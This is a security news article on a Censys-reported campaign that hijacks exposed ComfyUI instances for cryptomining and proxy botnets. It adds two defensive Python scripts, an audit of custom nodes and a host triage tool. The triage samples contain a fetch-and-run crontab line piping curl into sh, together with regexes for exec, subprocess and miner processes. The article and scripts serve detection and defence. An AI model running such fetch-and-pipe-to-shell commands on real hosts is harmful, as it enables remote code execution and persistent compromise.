Over 1,000 Exposed ComfyUI Instances Hijacked for Cryptomining and Proxy Botnet
Security researchers at Censys have uncovered an active campaign that targets internet‑exposed ComfyUI instances to build a cryptomining and proxy botnet. The campaign uses automated tooling to find misconfigured deployments, gain remote code execution, and install miners and proxy software.
How the attackers work
“A purpose-built Python scanner continuously sweeps major cloud IP ranges for vulnerable targets,” Mark Ellzey, a Censys security researcher, wrote in the report. The scanner looks for publicly reachable ComfyUI services, checks whether any installed custom nodes accept raw Python or shell commands, and then uses those nodes to run attacker-supplied code. The sequence is the familiar kill chain: reconnaissance, then exploitation and installation.
Censys said the malicious chain leverages both preexisting risky node families and an installer path through ComfyUI-Manager. “If none of the target nodes are present, the scanner checks whether ComfyUI-Manager is installed,” Censys explained. “If available, it installs a vulnerable node package itself, then retries exploitation.”
Researchers at Snyk documented parts of this attack surface in December 2024, showing that some custom node families accept raw Python and execute it. Because ComfyUI itself ships without authentication, anyone who can reach the web interface or its API can submit a workflow that triggers such a node. Censys named specific node families the campaign looks for, including Vova75Rus/ComfyUI-Shell-Executor, filliptm/ComfyUI_Fill-Nodes, seanlynch/srl-nodes, and ruiqutech/ComfyUI-RuiquNodes.
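A defender's version of the node check described above, as an added example that is not the attackers' scanner or ComfyUI's own code: it walks a ComfyUI checkout's custom_nodes directory, reads each clone's upstream repository from .git/config, and flags the families the report names, plus a heuristic (an assumption, not something the report describes) for any other node whose Python hands strings to exec, eval, subprocess or a shell. The sample tree it builds is constructed for the demonstration.

```python
"""Audit a ComfyUI checkout for the unsafe custom-node families named in the report.

Added example, not Censys tooling or ComfyUI code. Assumes custom nodes are git
clones under <comfy_root>/custom_nodes/<dir> whose .git/config names the upstream
repository. The sample tree from build_sample_tree() is constructed, and the
exec/subprocess heuristic is the author's assumption, not a finding from the report.
"""
import os
import re
import tempfile

# Repositories the report says the scanner probes for, as lowercase owner/name.
RISKY_REPOS = {
    "vova75rus/comfyui-shell-executor",
    "filliptm/comfyui_fill-nodes",
    "seanlynch/srl-nodes",
    "ruiqutech/comfyui-ruiqunodes",
}

# Heuristic: node code that passes strings to the interpreter or a shell deserves
# a manual look even when its repository is not on the list above.
EXEC_PATTERN = re.compile(r"\b(?:exec|eval)\s*\(|\bsubprocess\.|\bos\.(?:system|popen)\s*\(")


def origin_repo(node_dir):
    """Return the origin remote as lowercase 'owner/name', or None if not a git clone."""
    try:
        with open(os.path.join(node_dir, ".git", "config"), encoding="utf-8") as fh:
            lines = fh.read().splitlines()
    except OSError:
        return None
    section, url = None, None
    for line in lines:
        stripped = line.strip()
        if stripped.startswith("["):
            section = stripped
        elif section == '[remote "origin"]' and stripped.startswith("url"):
            url = stripped.split("=", 1)[1].strip()
            break
    if not url:
        return None
    # Handles https://host/owner/name(.git) and git@host:owner/name(.git).
    m = re.search(r"[:/]([^/:]+/[^/]+?)(?:\.git)?/?$", url)
    return m.group(1).lower() if m else None


def exec_hits(node_dir):
    """Python files under node_dir that match EXEC_PATTERN (to be reviewed by hand)."""
    hits = []
    for root, dirs, files in os.walk(node_dir):
        dirs[:] = [d for d in dirs if d != ".git"]
        for name in files:
            if not name.endswith(".py"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                if EXEC_PATTERN.search(fh.read()):
                    hits.append(os.path.relpath(path, node_dir))
    return sorted(hits)


def audit_custom_nodes(comfy_root):
    """One finding per directory in custom_nodes/, keyed by directory name."""
    nodes_dir = os.path.join(comfy_root, "custom_nodes")
    findings = {}
    for entry in sorted(os.listdir(nodes_dir)):
        node_dir = os.path.join(nodes_dir, entry)
        if not os.path.isdir(node_dir):
            continue
        repo = origin_repo(node_dir)
        findings[entry] = {
            "repo": repo,
            "known_risky": repo in RISKY_REPOS,
            "exec_hits": exec_hits(node_dir),
        }
    return findings


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def build_sample_tree(comfy_root):
    """Constructed sample: one listed node, one benign clone, one local node using exec()."""
    base = os.path.join(comfy_root, "custom_nodes")
    _write(os.path.join(base, "ComfyUI-Shell-Executor", ".git", "config"),
           '[core]\n\trepositoryformatversion = 0\n'
           '[remote "origin"]\n\turl = https://github.com/Vova75Rus/ComfyUI-Shell-Executor.git\n')
    _write(os.path.join(base, "ComfyUI-Shell-Executor", "nodes.py"),
           "import subprocess\n\ndef run(cmd):\n    return subprocess.run(cmd, shell=True)\n")
    _write(os.path.join(base, "SafeNode", ".git", "config"),
           '[remote "origin"]\n\turl = git@github.com:example/SafeNode.git\n')
    _write(os.path.join(base, "SafeNode", "nodes.py"),
           "def invert(image):\n    return (1.0 - image,)\n")
    _write(os.path.join(base, "LocalNode", "nodes.py"),
           "def run_code(code):\n    exec(code)\n")


def run_demo():
    """Build the constructed tree in a temp dir and audit it."""
    root = tempfile.mkdtemp(prefix="comfy-audit-")
    build_sample_tree(root)
    return audit_custom_nodes(root)


if __name__ == "__main__":
    for name, f in run_demo().items():
        flag = "LISTED" if f["known_risky"] else ("review" if f["exec_hits"] else "ok")
        print(f"{flag:7} {name:25} repo={f['repo']} exec_hits={f['exec_hits']}")
```

Run it against a real checkout with `audit_custom_nodes("/path/to/ComfyUI")`. A clean audit is not a pass on its own: the report says that when none of the listed nodes is present the scanner installs one through ComfyUI-Manager, so an instance that is reachable from the internet stays exploitable regardless of what this script finds.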
Tools and payloads
Censys found an open directory on 77.110.96.200, an IP linked to Aeza Group, a bulletproof hosting provider. That directory contained reconnaissance scripts, a scanner/exploitation framework, and a malicious package the attackers use to fetch a next-stage shell script called ghost.sh.
Once code execution is achieved, ghost.sh performs several actions. Censys said it disables shell history, kills competing miners, deploys mining binaries, and installs persistence. The script uses an LD_PRELOAD technique to hide a watchdog process that revives the miner if it is terminated. It also copies the miner to multiple locations and runs chattr +i on them, setting the immutable attribute so the binaries cannot be deleted or modified until that attribute is cleared.
The campaign runs XMRig to mine Monero and uses lolMiner to mine Conflux. In addition, the attackers install Hysteria V2 and run a Flask-based command-and-control panel to manage infected nodes and to sell them as proxies, Censys said.
Censys also found code that targets a competing mining botnet known as Hisana. “Rather than just killing it, ghost.sh overwrites its configuration to redirect Hisana’s mining output to its own wallet address,” Censys wrote, and then occupies Hisana’s C2 port so the competitor cannot restart.
Scale and persistence
Attack surface management platforms show more than 1,000 publicly-accessible ComfyUI instances, according to Censys. That number is small compared with some internet services, but it is enough for an opportunistic operator to turn a tidy profit.
Censys also noted the scanner supports persistence by downloading ghost.sh every six hours and reapplying the exploit when ComfyUI restarts. The campaign includes cleanup steps such as clearing ComfyUI prompt history to remove traces of the attack.
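A triage script for the persistence tricks described above (LD_PRELOAD hiding, immutable copies of the miner, the miner and proxy processes themselves), as an added example that is not Censys tooling or the malware. Each checker takes the text of one artifact so it can run against output copied from a suspect host (`cat /etc/ld.so.preload`, `lsattr -R` over the usual binary and temp directories, `ps -eo pid,args`, `crontab -l`). It assumes the LD_PRELOAD hook is installed through /etc/ld.so.preload, the usual persistent route, and the fetch-and-run cron check is a generic persistence heuristic rather than a mechanism the report describes. The sample artifacts, paths, pool host and wallet are constructed placeholders, not indicators from the report.

```python
"""Triage a Linux host for the persistence techniques the report attributes to ghost.sh.

Added example, not Censys tooling or the malware itself. The artifact texts below are
constructed; every path, host and wallet in them is a placeholder.
"""
import re

# Process names the report attributes to the campaign, plus miner-style arguments.
MINER_PATTERN = re.compile(r"xmrig|lolminer|hysteria|stratum\+tcp://|--donate-level", re.I)
# Generic fetch-and-execute one-liner (an assumption, not a pattern from the report).
FETCH_AND_RUN = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b", re.I)


def preload_entries(text):
    """Libraries listed in /etc/ld.so.preload (whitespace separated); a clean host has none."""
    entries = []
    for line in text.splitlines():
        entries.extend(line.split("#", 1)[0].split())
    return entries


def immutable_files(lsattr_output):
    """Paths whose lsattr flag field contains 'i' (set by chattr +i).
    lsattr prints '<flags> <path>' per file; 'i' is the immutable flag."""
    found = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            found.append(parts[1])
    return found


def suspicious_processes(ps_output):
    """(pid, args) rows of 'ps -eo pid,args' output matching MINER_PATTERN; header skipped."""
    rows = []
    for line in ps_output.splitlines()[1:]:
        parts = line.strip().split(None, 1)
        if len(parts) == 2 and MINER_PATTERN.search(parts[1]):
            rows.append((int(parts[0]), parts[1]))
    return rows


def fetch_and_run_cron(crontab_text):
    """Crontab lines that download a script and pipe it into a shell."""
    return [l for l in crontab_text.splitlines()
            if l.strip() and not l.lstrip().startswith("#") and FETCH_AND_RUN.search(l)]


def triage(ld_preload, lsattr_out, ps_out, crontab):
    """Run every checker and collect the hits by artifact."""
    return {
        "preload": preload_entries(ld_preload),
        "immutable": immutable_files(lsattr_out),
        "processes": suspicious_processes(ps_out),
        "cron": fetch_and_run_cron(crontab),
    }


# Constructed sample artifacts (placeholders, not real indicators).
SAMPLE_LD_PRELOAD = "/usr/local/lib/libexample-hook.so\n"
SAMPLE_LSATTR = (
    "----i---------e------- /usr/local/bin/example-miner\n"
    "--------------e------- /usr/local/bin/python3\n"
    "----i---------e------- /tmp/.cache/example-miner\n"
)
SAMPLE_PS = (
    "    PID COMMAND\n"
    "      1 /sbin/init\n"
    "   4242 /usr/local/bin/example-miner -o stratum+tcp://pool.example:3333 -u WALLET_PLACEHOLDER\n"
    "   4243 /usr/local/bin/hysteria server -c /etc/example/hysteria.yaml\n"
    "   5001 python3 main.py --listen\n"
)
SAMPLE_CRON = (
    "# m h dom mon dow command\n"
    "0 */6 * * * curl -fsSL http://198.51.100.10/update.sh | sh\n"
    "30 2 * * * /usr/bin/certbot renew\n"
)


def run_demo():
    """Triage the constructed artifacts."""
    return triage(SAMPLE_LD_PRELOAD, SAMPLE_LSATTR, SAMPLE_PS, SAMPLE_CRON)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key:10} {value}")
```

Two caveats when collecting these artifacts live. A library in /etc/ld.so.preload is loaded into every dynamically linked process, ps and ls included, so a hidden watchdog can filter its own entries out of the output the checker sees; collect with a statically linked binary (a busybox build, for example) or from a mounted disk image. And files under chattr +i cannot be removed by root until `chattr -i` is run on each copy, which is why the script copies the miner to several places.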
Context and broader activity
Security watchers have seen a rise in botnet campaigns across exposed internet services. Pulsedive reported increases in bot and node activity over recent six‑month periods, and QiAnXin XLab documented a separate campaign that implants a DDoS backdoor called NetDragon on vulnerable NAS devices and tampers with update domains to block patches.
“Much of the tooling in this repository appears hastily assembled, and the overall tactics and techniques might initially suggest unsophisticated activity,” Censys said. “The operator identifies exposed ComfyUI instances running custom nodes, determines which of those nodes expose unsafe functionality, and then uses them as a pathway to remote code execution.” In risk terms, the vulnerability is the unsafe node functionality, the threat is an operator scanning for it, and the exposure of the service is what turns the two into a compromise.
The takeaway is simple. Publicly exposed, unauthenticated developer services are prime targets. ComfyUI users should keep the service bound to localhost (the default; starting it with --listen and no address binds it to all interfaces), put any remote access behind a VPN or an authenticating reverse proxy, remove unsafe custom nodes, and keep deployments updated. Organizations should scan their cloud ranges for accidental exposures and apply authentication and network controls.
For now, Censys, Snyk, Pulsedive, and QiAnXin XLab are tracking the activity and publishing indicators. Administrators should treat their findings as actionable intelligence.
#ComfyUI #Cryptojacking #Botnet #CyberSecurity #CloudSecurity #ThreatIntel